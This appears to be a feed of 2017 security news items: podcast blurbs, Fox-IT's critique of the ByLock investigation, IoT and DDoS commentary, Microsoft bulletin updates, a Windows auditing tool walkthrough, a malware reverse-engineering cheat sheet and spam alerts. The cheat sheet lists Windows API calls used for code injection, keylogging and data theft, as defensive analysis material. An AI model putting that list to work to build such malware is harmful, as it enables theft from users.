"Avast Mobile Security is a complete security solution capable of identifying potentially unwanted (PUP) and malicious apps (TRJ). The app protects millions of endpoints on a daily basis using a wide range of cloud and on-device-based detection capabilities. Our hybrid mix of technology, which includes static and dynamic (behavioral) analysis in conjunction with the latest machine learning algorithms allow us to provide state of the art malware protection.

Avast has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-TEST, an AMTSO-member tester.

Enterprise Security Weekly #61 – Crying Uncle

Tom Parker of Accenture joins us. In the news, Bay Dynamics and VMware join forces, confessions of an insecure coder, Flexera acquires BDNA, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode61

Visit https://www.securityweekly.com for all the latest episodes!

Fox-IT debunks report on ByLock app that landed 75,000 people in jail in Turkey

The Turkish government has been actively pursuing the prosecution of the participants of the Gülen movement in what it calls “the Fetullahist Terrorist Organization/Parallel State Structure (FETÖ/PDY)”. To this end, the Turkey’s National Intelligence Organization (Millî İstihbarat Teşkilatı or MİT in Turkish) has investigated the relation of a publicly available smart phone messaging application called ByLock to “FETÖ/PDY”, which is alleged to have been used during the failed coup attempt in Turkey on July 15, 2016.

The MİT is reported to have identified 215,092 users of the ByLock. Of which approximately 75,000 were detained. In an attempt to link a user of ByLock to a real person, the MİT has written a report on its findings which concluded that “ByLock has been offered to the exclusive use of the ‘FTÖ/PDY’ members”.

However, the investigation performed by Fox-IT contradicts the key findings of the MİT. Fox-IT also discovered inconsistencies in the MİT report that indicated manipulation of results and/or screenshots by MİT. What is more, Fox-IT found that the MİT investigation is fundamentally flawed due to the contradictory and baseless findings, lack of objectivity and lack of transparency.

Overall, Fox-IT concluded that the quality of the MİT report is very low, especially when it was weighed against the legal consequences of the conclusions which is the detention of 75,000 Turkish citizens.

This blog contains the conclusions of Fox-IT’s expert witness report. You can also download the full report of Fox-IT and the technical MİT report. The translated version of the MIT report will be made available later.

Reports

Fox-IT’s Expert Witness Report can be downloaded here.

md5: 3dac076d4e0d9d8984533bc04be336a7
sha1: 450ba8665d3a508d569bbc7ec761e9793e42d9c6
sha256: 7dbc402b8e03c311245814fb74dff699330d459f2067ecd574974538086caa7e

MIT’s Technical Report can be downloaded here.

md5: a9f18e08db62ef1c1f71101d37589157
sha1: 68a86e7b8b78c9d1493cb63318dba1f09cc62437
sha256: 17768d91bdae3e78499cb20214bf83abe49948a5d5f41c1aa35a1d1561dd0e62

Conclusions

1. What is Fox-IT’s opinion on the investigation methodology used by MIT in the ByLock investigation?

Multiple key findings from the MIT investigation were contradicted by open-source research conducted by Fox-IT and other findings were shown not to be supported by the evidence presented by MIT. Furthermore, the MIT investigation lacks in transparency: evidence and analysis steps were in many cases omitted from the MIT report. Multiple findings (that could be verified) were shown to be incorrect, which leaves the impression that more findings would proof to be incorrect or inaccurate if they could only be verified.

Fox-IT finds the MIT investigation lacking in objectivity, since there is no indication that MIT investigated the alternative scenario: namely that ByLock has not exclusively been offered to members of the alleged FTÖ/PDY. Investigating alternate scenarios is good practice in an investigation. It helps prevent tunnel vision in cases where investigators are biased towards a predefined outcome. Fox-IT’s examination of the MIT investigation suggests that MIT was, in advance, biased towards the stated conclusion and that MIT has not shown the required objectivity and thoroughness in their investigation to counter this bias.

Fox-IT concludes that the MIT investigation as described in the MIT report does not adhere to the forensic principles as outlined in section 3.1 of this report and should therefore not be regarded as a forensic investigation. The investigation is fundamentally flawed due to the contradicted and unfounded findings, lack of objectivity and lack of transparency. As a result, the conclusions of the investigation are questionable. Fox-IT recommends to conduct a forensic investigation of ByLock in a more thorough, objective and transparent manner.

2. How sound is MIT’s identification of individuals that have used the ByLock application?

The MIT report contains very limited information on the identification of individuals. Fox-IT has shown that ByLock user accounts are, on their own, difficult to attribute to an individual: it is easy to impersonate other individuals when registering a ByLock account and MIT is limited to an IP address from the ByLock server log to identify individuals. Attributing this IP address to actual individuals is not straightforward and error-prone; therefore, possibly leading to identification of the wrong individuals as ByLock users.

Fox-IT is unable to assess the soundness of the identification method, since the MIT report does not provide information on this method. The omission of a description of this method is troubling. Any errors in the method will not be discovered and the reader is left to assume MIT does not make mistakes. While transparency is one of the fundamental principles of forensic investigations, this critical part of the investigation is completely opaque.

3. What is the qualification of soundness on MIT’s conclusion regarding the relation between ByLock and the alleged FTÖ/PDY?

The conclusions and findings of the MIT report were examined by Fox-IT. It was shown that the argumentation is seriously flawed and that seven out of nine stated arguments are incorrect or questionable (see conclusion 6.1). The remaining two arguments are, on their own, not sufficient to support MIT’s conclusion. As a result, the conclusion of the MIT report, “ByLock has been offered to the exclusive use of the members of the terrorist organization of FTÖ/PDY”, is not sound.

4. Are there any other issues identified by Fox-IT that are relevant to the ByLock investigation?

Fox-IT encountered inconsistencies in the MIT report that indicate manipulation of results and/or screenshots by MIT. This is very problematic since it is not clear which of the information in the report stems from original data and which information was modified by MIT (and to which end). This raises questions as to what part of the information available to MIT was altered before presentation, why it was altered and what exactly was left out or changed. When presenting information as evidence, transparency is crucial in differentiating between original data (the actual evidence) and data added or modified by the analyst.

Furthermore, Fox-IT finds the MIT report implicit, not well-structured and lacking in essential details. Bad reporting is not merely a formatting issue. Writing an unreadable report that omits essential details reduces the ability for the reader to scrutinize the investigation that lead to the conclusions. When a report is used as a basis for serious legal consequences, the author should be thorough and concise in the report as to leave no questions regarding the investigation.
Fox-IT has read and written many digital investigation reports over the last 15 years. Based on this experience, Fox-IT finds the quality of the MIT report very low, especially when weighed against the consequences of the conclusions.

5 Ways to Future-Proof IoT Devices

The absence of regulation is what has resulted in the innovation of software we see today​. But as hardware and software merge, as the shelf life of software becomes the shelf life of hardware, we are going to need a number of guarantees to ensure that the benefits keep outweighing the risks.​

I have never replaced my thermostat. Nor the control system of my lights in my flat. People buy a new oven or refrigerator every 10 years, a new car every 20 years maybe. And these are all run by software, old software, with bugs. And that is “fine” (mind the quotes), to the extent that someone takes responsibility for the system or solution as a whole, the collection of all these parts with a single brand name on the box that is legally responsible. Now think IoT. Thousands of individual vendors who sit mostly abroad, offshore code development with for the most part a lack of teams, unity or any other form of structure or legal jurisdiction for that matter. Low to no profit margins for technology sold by the lowest bidder where neither the buyer nor the seller have any interest in security.

The chip-maker of the device says they just sell chips, the manufacturer says they just implemented the chips and put them on the board, the software makers build the software for maybe hundreds of chips, ignoring some of the extra features and weaknesses that come with certain components. The product ships and problems are found at a later stage either through design errors or implementation errors while implementing a piece of software that has vulnerabilities. And this is where we are today.

Not a single snowflake feels responsible for the avalanche.

So, five things I would like to see as part of a basic set of guarantees when purchasing some of these products in the future:

  1. Guaranteed life expectancy
    When IoT vendors say they offer “life time support,” it is not your life, or the product’s life. It is the life of the company. We saw this with Revolv last year. Guaranteeing a certain number of years of product focus, updates, community support e.g. forums, as well as guaranteeing that the device will work is paramount. This means tracking the life cycle of the technology inside the devices, ensuring whatever cloud services are being used will still be there and cannot be interrupted or hijacked afterwards
  2. Privacy and data handling transparency
    Inform the consumer where the data is being saved to i.e. physical country, how long the data will be there as well as what data is being saved and to what level of detail. Give the consumer the option to remove all data produced by the device if you can prove ownership of the device. I have no problems waiving some of my rights when telling the IoT vendor and potentially the world I like to make something that needs the pizza setting of my IoT oven Sunday morning, but inform me first. Will my data go to a European cloud or a US cloud and what laws can be enforced upon my data and the correlation based on my data
  3. Technology transparency
    To the extent possible, inform the consumer about what technology is being used with regards to e.g. open source software and licensed software. Food manufacturers have to ensure the correct labeling of their product as far as ingredients go. Why not technology for the individual parts or software components, at least to some extent so that consumers can make informed choices about what it is they can and want to use
  4. Security feature transparency
    Is the product allowing management through a cloud service with two-factor authentication? Or only Bluetooth, Wifi? Will it detect your neighbor trying to log on to your device? Can someone break into my device remotely? What kind of features the device has will hopefully in the future start influencing the buying behavior of the consumer. If you want all devices to only use the cloud for remote control then that should be a choice that can be made by looking at the box
  5. Planned obsolescence
    A more difficult one but an important one. For IoT that is more sensitive or even vital, a shut down process should be explored to be able to shut down the device when it has exceeded its life or has been declared end of life. When reliance becomes dependence then planning is required in order to ensure that the benefits and added value of the product can be sustained. This is easier with pace makers and other devices that receive a lot of care and tracking. But for other devices that are basically enable-and-forget, this implies being able to signal its remaining lifetime to the owner and thus implies knowing who the owner is. This last part might be a more difficult issue as it has been tried with for example tying domain names to people for the purpose of reporting abuse cases. Not only that, this would mean another potential privacy problem if the information is leaked. This is a sensitive topic but more discussion is needed to see how devices can be categorized and what the possibilities are. This can also lead to abuse from the vendor side. Printer and printer ink cartridge vendors were very quick in jumping on the planned obsolescence track being very quick in flagging printer ink cartridges as empty, forcing the customer to buy more. More discourse on this subject is needed from all sides: designers, vendors, suppliers and consumers.

DDoS Attacks on Internet Providers Can Impact Downstream Customers

Enterprises need to consider that even if they have protection against distributed denial of service (DDoS) attacks, their business could be taken offline if their Internet Service Provider (ISP), hosting provider or Domain Name Service (DNS) provider does not have adequate DDoS protection. ISPs and hosting providers are attractive DDoS targets for hackers, because the impacts are far-ranging; think of it in terms of hitting several birds with one stone. That’s why it’s crucial to do your research when it comes to choosing your providers.

Direct vs. Indirect Hits

Hackers sometimes target a hosting provider or ISP directly, as was the case a couple of weeks ago in late August, when DreamHost was directly hit by a DDoS attack, resulting in several hours of downtime for its customers. Another example of a direct hit was in October 2016, when the Domain Name Service provider Dyn suffered a mega DDoS attack. Both incidents show that an attack on an Internet gateway can spell trouble for any of its customers downstream; and there are many more such examples. The volumetric attacks make headlines and raise eyebrows, however, many providers experience several low-threshold DDoS attacks each day. Even if hackers launch a low-threshold attack on a provider, it can result in network “noise” and degraded service for downstream customers.

Even an indirect hit; i.e., an attack on one of a hosting provider’s enterprise customers, can cause collateral damage to other customers using the service. If a hacker succeeds in launching a several-hundred-gigabit DDoS attack to take a website offline, it will almost certainly affect customers who co-reside or are reliant on the infrastructure transporting the attack; that’s collateral damage.

Potential Effect on Business

As part of their service level agreements (SLAs), many hosting providers offer 99.9% (or even 99.999%) uptime. However, even 1% downtime can dramatically affect a business. In the event of downtime, some providers offer a compensation, such as a credit to the customer’s account, usually a percentage of the monthly fee. However, that credit might not outweigh the downtime cost to the tenant; if a business website is down, that usually means that clients or customers can’t find the business online or access its products/services. This usually results in loss of revenue, and damage to brand/reputation.

Be aware that not all ISPs and hosting providers are equal when it comes to DDoS protection. When shopping for a 3rd party ISP or hosting service, ask the right questions. Ask if they have a dedicated, in-line automated DDoS mitigation appliance at the peering and transit points that blocks all DDoS traffic from entering their network. Corero technology enables real-time, algorithmic identification of network anomalies and subsequent mitigation of the attack traffic, eliminating the DDoS attacks before they can traverse the network and impact downstream customers. Also ask whether they offer DDoS Protection Services (increasingly, many of them do offer this service, either as a value-added service or for a premium.)

For more information, contact us.

Hack Naked News #140 – September 12, 2017

Bypassing Windows 10 security software, Android is vulnerable (go figure), hacking syringe infusion pumps to deliver fatal doses, and more. Jason Wood of Paladin Security discusses iOS 11 on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode140Visit https://www.securityweekly.com for all the latest episodes!

MS16-039 – Critical: Security Update for Microsoft Graphics Component (3148522) – Version: 4.0

Severity Rating: Critical
Revision Note: V4.0 (September 12, 2017): Revised the Microsoft Windows affected software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-0165. Consumers running Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Skype for Business, and Microsoft Lync. The most severe of the vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts.

MS16-095 – Critical: Cumulative Security Update for Internet Explorer (3177356) – Version: 3.0

Severity Rating: Critical
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Internet Explorer 11 installed on Windows 10 Version 1703 for 32-bit Systems and Internet Explorer 11 installed on Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3326. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Internet Explorer on Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability. Customers who are running other versions of Windows 10 and who have installed the June cumulative updates do not need to take any further action.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-123 – Important: Security Update for Windows Kernel-Mode Drivers (3192892) – Version: 3.0

Severity Rating: Important
Revision Note: V3.0 (September 12, 2017): Revised the Affected Software table to include Windows 10 Version 1703 for 32-bit Systems and Windows 10 Version 1703 for x64-based Systems because they are affected by CVE-2016-3376. Consumers using Windows 10 are automatically protected. Microsoft recommends that enterprise customers running Windows 10 Version 1703 ensure they have update 4038788 installed to be protected from this vulnerability.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

MS16-087 – Critical: Security Update for Windows Print Spooler Components (3170005) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (September 12, 2017): To address known issues with the 3170455 update for CVE-2016-3238, Microsoft has made available the following updates for currently-supported versions of Microsoft Windows: • Rereleased update 3170455 for Windows Server 2008 • Monthly Rollup 4038777 and Security Update 4038779 for Windows 7 and Windows Server 2008 R2 • Monthly Rollup 4038799 and Security Update 4038786 for Windows Server 2012 • Monthly Rollup 4038792 and Security Update 4038793 for Windows 8.1 and Windows Server 2012 R2 • Cumulative Update 4038781 for Windows 10 • Cumulative Update 4038781 for Windows 10 Version 1511 • Cumulative Update 4038782 for Windows 10 Version 1607 and Windows Server 2016. Microsoft recommends that customers running Windows Server 2008 reinstall update 3170455. Microsoft recommends that customers running other supported versions of Windows install the appropriate update. See Microsoft Knowledge Base Article 3170005 (https://support.microsoft.com/en-us/help/3170005) for more information.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The more severe of the vulnerabilities could allow remote code execution if an attacker is able to execute a man-in-the-middle (MiTM) attack on a workstation or print server, or sets up a rogue print server on a target network.

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a Powershell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.


The script confirms that it's running with admin rights, checks PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Window Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.


 WINSpect then confirmed that UAC was enabled, and that it should notify me only apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.


WINSpect wrapped up with a quick check of configurable services, SMSvcHost is normal as part of .NET, even if I don't like it, but the flowExportService doesn't need to be there at all, I removed that a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enable...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts on the to-do list. 
Cheers...until next time.

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement our understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments, labels; rename functions, variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX .
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • EAX→RAX, ECX→RCX, EBX→RBX, ESP→RSP, EIP→RIP
  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE/ JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from “interesting” code block to the other.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).

Post-Scriptum

Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Enterprise Security Weekly #60 – Live From Gainesville

Don Pezet of ITProTV and Doug White join us to discuss network security architecture. In the news, SealPath and Boldon James join forces, following the money, AI in the cloud, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode60Visit https://www.securityweekly.com for all the latest episodes!

DDoS Attack Temporarily Folds Major Poker Game Site

Late last week Americas Cardroom’s Winning Poker Network (WPN), a major online gaming site, was hit with a ransom denial of service (RDoS) attack that lasted a few days. This was not the first DDoS attack that the company experienced; actually, it was the fourth such attack since 2014. Incidents like this are prime examples of how DDoS attacks result in loss of revenue and customer trust; the company was forced to temporarily cancel all its tournaments and issue refunds.

The gaming industry is frequently targeted by DDoS attacks, in part because they do such damage to a gaming company’s bottom line and reputation. Timing is critical in online gaming, so it makes sense that gamers don’t like website latency. Unhappy gamers easily take their gaming or gambling money elsewhere. It’s no surprise that the hackers demanded ransom from WPN in exchange for ceasing the attack; a DDoS attack is powerful leverage. However, the WPN CEO was wise to not cave in to the hacker’s criminal demand, since that would have only rewarded the hacker’s bad behavior and encouraged that hacker or other hackers to follow suit (pun intended).

To prevent such future DDoS or RDoS attacks, WPN should “up the ante” in terms of its DDoS protection. Now more than ever, DDoS protection is affordable, scalable and flexible. Companies have the choice of hosting a DDoS protection appliance on-premises, or a hybrid approach that combines an appliance with a cloud scrubbing solution or outsourced protection via their Internet Service Provider or Hosting Provider. Modern DDoS protection services are a game-changing opportunity for the gaming industry. After four bouts with DDoS hackers, WPN can certainly find a solution that solves its problem; you can bet on that.

For more information, contact us.

Quit Talking About "Security Culture" – Fix Org Culture!

I have a pet peeve. Ok, I have several, but nonetheless, we're going to talk about one of them today. That pet peeve is security professionals wasting time and energy pushing a "security culture" agenda. This practice of talking about "security culture" has arisen over the past few years. It's largely coming from security awareness circles, though it's not always the case (looking at you anti-phishing vendors intent on selling products without the means and methodology to make them truly useful!).

I see three main problems with references to "security culture," not the least of which being that it continues the bad old practices of days gone by.

1) It's Not Analogous to Safety Culture

First and foremost, you're probably sitting there grinding your teeth saying "But safety culture initiatives work really well!" Yes, they do, but here's why: Safety culture can - and often does - achieve a zero-sum outcome. That is to say, you can reduce safety incidents to ZERO. This factoid is excellent for when you're around construction sites or going to the hospital. However, I have very bad news for you. Information (or cyber or computer) security will never be a zero-sum game. Until the entirety of computing is revolutionized, removing humans from the equation, you will never prevent all incidents. Just imagine your "security culture" sign by the entrance to your local office environment, forever emblazoned with "It Has Been 0 Days Since Our Last Incident." That's not healthy or encouraging. That sort of thing would be outright demoralizing!

Since you can't be 100% successful through preventative security practices, you must then shift mindset to a couple things: better decisions and resilience. Your focus, which most of your "security culture" programs are trying to address (or should be), is helping people make better decisions. Well, I should say, some of you - the few, the proud, the quietly isolated - have this focus. But at the end of the day/week/month/year you'll find that people - including well-trained and highly technical people - will still make mistakes or bad decisions, which means you can't bank on "solving" infosec through better decisions.

As a result, we must still architect for resiliency. We must assume something will breakdown at some point resulting in an incident. When that incident occurs, we must be able to absorb the fault, continue to operate despite degraded conditions, while recovering to "normal" as quickly, efficiently, and effectively as possible. Note, however, that this focus on resiliency doesn't really align well with the "security culture" message. It's akin to telling people "Safety is really important, but since we have no faith in your ability to be safe, here's a first aid kit." (yes, that's a bit harsh, to prove a point, which hopefully you're getting)

2) Once Again, It Creates an "Other"

One of the biggest problems with a typical "security culture" focus is that it once again creates the wrong kind of enablement culture. It says "we're from infosec and we know best - certainly better than you." Why should people work to make better decisions when they can just abdicate that responsibility to infosec? Moreover, since we're trying to optimize resiliency, people can go ahead and make mistakes, no big deal, right?

Part of this is ok, part of it is not. On the one hand, from a DevOps perspective, we want people to experiment, be creative, be innovative. In this sense, resilience and failure are a good thing. However, note that in DevOps, the responsibility for "fail fast, recover fast, learn fast" is on the person doing the experimenting!!! The DevOps movement is diametrically opposed to fostering enablement cultures where people (like developers) don't feel the pain from their bad decisions. It's imperative that people have ownership and responsibility for the things they're doing. Most "security culture" dogma I've seen and heard works against this objective.

We want enablement, but we don't want enablement culture. We want "freedom AND responsibility," "accountability AND transparency," etc, etc, etc. Pushing "security culture" keeps these initiatives separate from other organizational development initiatives, and more importantly it tends to have at best a temporary impact, rather than triggering lasting behavioral change.

3) Your Goal Is Improving the Organization

The last point here is that your goal should be to improve the organization and the overall organizational culture. It should not be focused on point-in-time blips that come and go. Additionally, your efforts must be aimed toward lasting impact and not be anchored around a cult of personality.

As a starting point, you should be working with org dev personnel within your organization, applying behavior design principles. You should be identifying what the target behavior is, then working backward in a piecemeal fashion to determine whether that behavior can be evoked and institutionalized through one step or multiple steps. It may even take years to accomplish the desired changes.

Another key reason for working with your org dev folks is because you need to ensure that anything "culture" that you're pursuing is fully aligned with other org culture initiatives. People can only assimilate so many changes at once, so it's often better to align your work with efforts that are already underway in order to build reinforcing patterns. The worst thing you can do is design for a behavior that is in conflict with other behavior and culture designs underway.

All of this is to underline the key point that "security culture" is the wrong focus, and can in some cases even detract from other org culture initiatives. You want to improve decision-making, but you have to do this one behavior at a time, and glossing over it with the "security culture" label is unhelpful.

Lastly, you need to think about your desired behavior and culture improvements in the broader context of organizational culture. Do yourself a favor and go read Laloux's Reinventing Organizations for an excellent treatise on a desirable future state (one that aligns extremely well with DevOps). As you read Laloux, think about how you can design for security behaviors in a self-managed world. That's the lens through which you should view things, and this is where you'll realize a "security culture" focus is at best distracting.

---
So... where should you go from here? The answer is three-fold:
1) Identify and design for desirable behaviors
2) Work to make those behaviors easy and sustainable
3) Work to shape organizational culture as a whole

Definitionally, here are a couple starters for you...

First, per Fogg, Behavior happens when three things come together: Motivation, Ability (how hard or easy it is to do the action), and a Trigger (a prompt or cue). When Motivation is high and it's easy to do, then it doesn't take much prompting to trigger an action. However, if it's difficult to take the action, or the motivation simply isn't there, you must then start looking for ways to address those factors in order to achieve the desired behavioral outcome once triggered. This is the basis of behavior design.

Second, when you think about culture, think of it as the aggregate of behaviors collectively performed by the organization, along with the values the organization holds. It may be helpful, as Laloux suggests, to think of the organization as its own person that has intrinsic motivations, values, and behaviors. Eliciting behavior change from the organization is, then, tantamount to changing the organizational culture.

If you put this all together, I think you'll agree with me that talking about "security culture" is anathema to the desired outcomes. Thinking about behavior design in the context of organizational culture shift will provide a better path to improvement, while also making it easier to explain the objectives to non-security people and to get buy-in on lasting change.

Bonus reference: You might find this article interesting as it pertains to evoking behavior change in others.

Good luck!

QTUM Cryptocurrency spam

This spam email appears to be sent by the Necurs botnet, advertising a new Bitcoin-like cryptocurrency called QTUM. Necurs is often used to pump malware, pharma and data spam and sometimes stock pump and dump. There is no guarantee that this is actually being sent by the people running QTUM, it could simply be a Joe Job to disrupt operations. Given some of the wording alluding to illegal

Hack Naked News #139 – September 5, 2017

AT&T customers at risk, WikiLeaks gets vandalized, catching hackers in the act, going to jail over VPNs, and more. Jason Wood of Paladin Security discusses wheeling and dealing malware on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode139Visit https://www.securityweekly.com for all the latest episodes!

Malware spam: "Scanning" pretending to be from tayloredgroup.co.uk

This spam email pretends to be from tayloredgroup.co.uk but it is just a simple forgery leading to Locky ransomware. There is both a malicious attachment and link in the body text. The name of the sender varies. Subject:       ScanningFrom:       "Jeanette Randels" [Jeanette.Randels@tayloredgroup.co.uk]Date:       Thu, May 18, 2017 8:26 pmhttps://dropbox.com/file/9A30AA-- Jeanette Randels

Startup Security Weekly #53 – Pulling Your G-String

Matt Alderman of Automox joins us. In the news, changing your audience’s perceptions, improving sales efforts, letting your kids fail, and updates from Facebook, Juniper, Qadium, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode53

Visit https://www.securityweekly.com for all the latest episodes!

QOTD – On Learning (New Things)

The further along you are in your career, the easier it is to fall back on the mistaken assumption that you’ve made it and have all the skills you need to succeed. The tendency is to focus all your energy on getting the job done, assuming that the rest will take care of itself. Big mistake.
[...]
The primary takeaway from Dweck’s research is that we should never stop learning. The moment we think that we are who we are is the moment we give away our unrealized potential.
[...]
The act of learning is every bit as important as what you learn. Believing that you can improve yourself and do things in the future that are beyond your current possibilities is exciting and fulfilling.
 -- Dr Travis Bradberry , Coauthor of Emotional Intelligence 2.0 & President at TalentSmart

Src: These are the skills you should learn that will pay off forever | World Economic Forum

Paul’s Security Weekly #528 – DDos Campaign for Memes

Larry Pesce and Dave Kennedy hold down the fort in Paul’s absence! Kyle Wilhoit of DomainTools delivers a tech segment on pivoting off domain information, Dave talks about the upcoming DerbyCon, and we discuss the latest information security news!

Full Show Notes: https://wiki.securityweekly.com/Episode528

Visit https://www.securityweekly.com for all the latest episodes!